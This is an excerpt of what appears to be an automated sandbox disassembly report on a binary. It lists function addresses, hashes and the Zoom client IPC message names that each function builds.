                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.pt.saveFileInMeetingChat$result
                • API String ID: 3166440930-837684600
                • Opcode ID: b6faf2d7807dfd87a315f5e5da05da3d30b7c375115f39822d5885237830b2a9
                • Instruction ID: 54f5e726144fad2175a97b7f322b4de4586fb16934774190af533d20df82211d
                • Opcode Fuzzy Hash: b6faf2d7807dfd87a315f5e5da05da3d30b7c375115f39822d5885237830b2a9
                • Instruction Fuzzy Hash: 03E092B190078057C7306B155C89B1E62A4A750B16F040A2CF2065A396CBF44948D779
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E247
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.execute.rule.request,00009D14,Name,00000004), ref: 00C6E262
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Name$com.zoom.app.assistant.control.system.execute.rule.request
                • API String ID: 3166440930-2398462025
                • Opcode ID: af9fc1899eb83a5bb1623d44316fecf6b3bc402b4dee34cc96df0e53f092ca68
                • Instruction ID: 60df57a4dbfc77b985a9c2bd988d43e417cfb2b8e02f10ce3be2ee9f900a1531
                • Opcode Fuzzy Hash: af9fc1899eb83a5bb1623d44316fecf6b3bc402b4dee34cc96df0e53f092ca68
                • Instruction Fuzzy Hash: E4E020B0A003C067D720FB159C49B1E67B9EB50B5AF40091DB6015F3E2CBF84844C774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E3D7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.execute.scene.request,00009D1C,SceneID,00000004), ref: 00C6E3F2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: SceneID$com.zoom.app.assistant.control.system.execute.scene.request
                • API String ID: 3166440930-3933472332
                • Opcode ID: 996c3f09b5a44ef3a10c8b4a2dcaa71fd5d64498eb62a8b29d9933202ac19337
                • Instruction ID: f805f9dd78ea31123627605be0beeb6941ce93a3ef5a4c666a4d4e166ed16c0c
                • Opcode Fuzzy Hash: 996c3f09b5a44ef3a10c8b4a2dcaa71fd5d64498eb62a8b29d9933202ac19337
                • Instruction Fuzzy Hash: 04E0D8B59003C1A7CB207B654C49B2E66B49B50716F00842DB6015F3D3CBF88884DF74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72387
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getcurrentuser.request,00009E7F,JsCallID,00000004), ref: 00C723A2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsCallID$com.zoom.app.cci.ccivideo.getcurrentuser.request
                • API String ID: 3166440930-415347638
                • Opcode ID: c30762bfa7c86d02dcd4df734ac591baa473963cec2988c2a116f71d22e332df
                • Instruction ID: 4cbe39aa75020d6d38297723bb6a0937985d2a1879a52eb0b7205d949acef3f5
                • Opcode Fuzzy Hash: c30762bfa7c86d02dcd4df734ac591baa473963cec2988c2a116f71d22e332df
                • Instruction Fuzzy Hash: EDE0D8B0A043C0A7C710AB518C45B1FF2B4AB5071AF00841CB3055B3D2CBF44884CF75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A3A7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.UpdateOpFlags,000027E0,Flags,00000004), ref: 00C6A3C2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Flags$com.zoom.app.UpdateOpFlags
                • API String ID: 3166440930-1776100906
                • Opcode ID: 9bc7d799cfab2c907019e8fd62258ea94bc08723d5f610786ac623a0d2e5e692
                • Instruction ID: 008bc70bfec655ec8d7cf052b3abdee983644d81c15eb6a6d629ed4498f568fe
                • Opcode Fuzzy Hash: 9bc7d799cfab2c907019e8fd62258ea94bc08723d5f610786ac623a0d2e5e692
                • Instruction Fuzzy Hash: E7E0D8B160038067CB207B119C96B5E76B4AB40755F40446CB2015B3E1CBF44944DF79
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72327
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.endvideo.request,00009E74,EndType,00000004), ref: 00C72342
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: EndType$com.zoom.app.cci.ccivideo.endvideo.request
                • API String ID: 4281283084-3168054736
                • Opcode ID: a4133a7bd596702f4d734bbb9594a7f46a6b50e699f2cfdc201ff43313f494f7
                • Instruction ID: 16ebef907b76bdd7aecedca300ea1cd90b21af9ca89768474b5e622fb2944dc5
                • Opcode Fuzzy Hash: a4133a7bd596702f4d734bbb9594a7f46a6b50e699f2cfdc201ff43313f494f7
                • Instruction Fuzzy Hash: A3E0D8B1A10384A7D710BB11CC45B2F66A8E740729F444428B24D5B3D2CFF54940DFB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C704D7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.audio.device.error.notification,00009CF7,deviceGUID,00000004), ref: 00C704F2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.audio.device.error.notification$deviceGUID
                • API String ID: 4281283084-3974739742
                • Opcode ID: 570480d328ae47b25af2e903a00646912e25d1bc54cf595b8bb6178b07b4d34f
                • Instruction ID: 7a68a4510dbdc624df631bd34bef86bcabc44a46466ef1b0d06194828cb40d65
                • Opcode Fuzzy Hash: 570480d328ae47b25af2e903a00646912e25d1bc54cf595b8bb6178b07b4d34f
                • Instruction Fuzzy Hash: 5FE0D870A00394A7E710BB149C89B2E36A4A740719F90443DB1445B382CFF44840DB78
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E4F7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.scenes.prepared.notify,00009D1D,Json,00000004), ref: 00C6E512
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Json$com.zoom.app.assistant.control.system.scenes.prepared.notify
                • API String ID: 3166440930-3163986488
                • Opcode ID: af24f53e8d7bb83d150b0a3a8296348791b124af6267effd943d0744441d90d7
                • Instruction ID: 0cb83586b341bfe663aebce52623c40db1dc2c5d46fa961cdcf380c72ddbb82f
                • Opcode Fuzzy Hash: af24f53e8d7bb83d150b0a3a8296348791b124af6267effd943d0744441d90d7
                • Instruction Fuzzy Hash: 4EE0D8B594038167C720AB105C45B5E66B4B750756F50042EB2015B3D2CFF44884C775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E497
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.devices.updated.notify,00009D17,Json,00000004), ref: 00C6E4B2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Json$com.zoom.app.assistant.control.system.devices.updated.notify
                • API String ID: 3166440930-1372683036
                • Opcode ID: fa964a21830be67c3500aa1da667871541b2560a608f253ce02dffab0123208a
                • Instruction ID: 6cca50ef40372ca501b8f6d1d072f7a0a286e6eea2c9a89066a9d4f52ecc7640
                • Opcode Fuzzy Hash: fa964a21830be67c3500aa1da667871541b2560a608f253ce02dffab0123208a
                • Instruction Fuzzy Hash: 9DE0DFB4A103D5A7C720AB658C46B2E66A4AB58B26F40452DB2015B3D2CBF48984DF78
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72447
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getuserlist.request,00009E81,JsCallID,00000004), ref: 00C72462
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsCallID$com.zoom.app.cci.ccivideo.getuserlist.request
                • API String ID: 3166440930-460326380
                • Opcode ID: f9ed6c9aaf32b771b1340efdaad316bfe27838e6b8feb55e3aca887b396236a6
                • Instruction ID: 17c087c8073d24fb8bcb3eb84ff9df9d99f146d4cd3d2bb4c6695d94967380ed
                • Opcode Fuzzy Hash: f9ed6c9aaf32b771b1340efdaad316bfe27838e6b8feb55e3aca887b396236a6
                • Instruction Fuzzy Hash: 7BE0D8B0A103C0A7C710BB529C85B1F66B4E740716F00442CB2065F3D2CBF44844DF74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70477
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.audio.device.created.notification,00009CF6,deviceGUID,00000004), ref: 00C70492
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
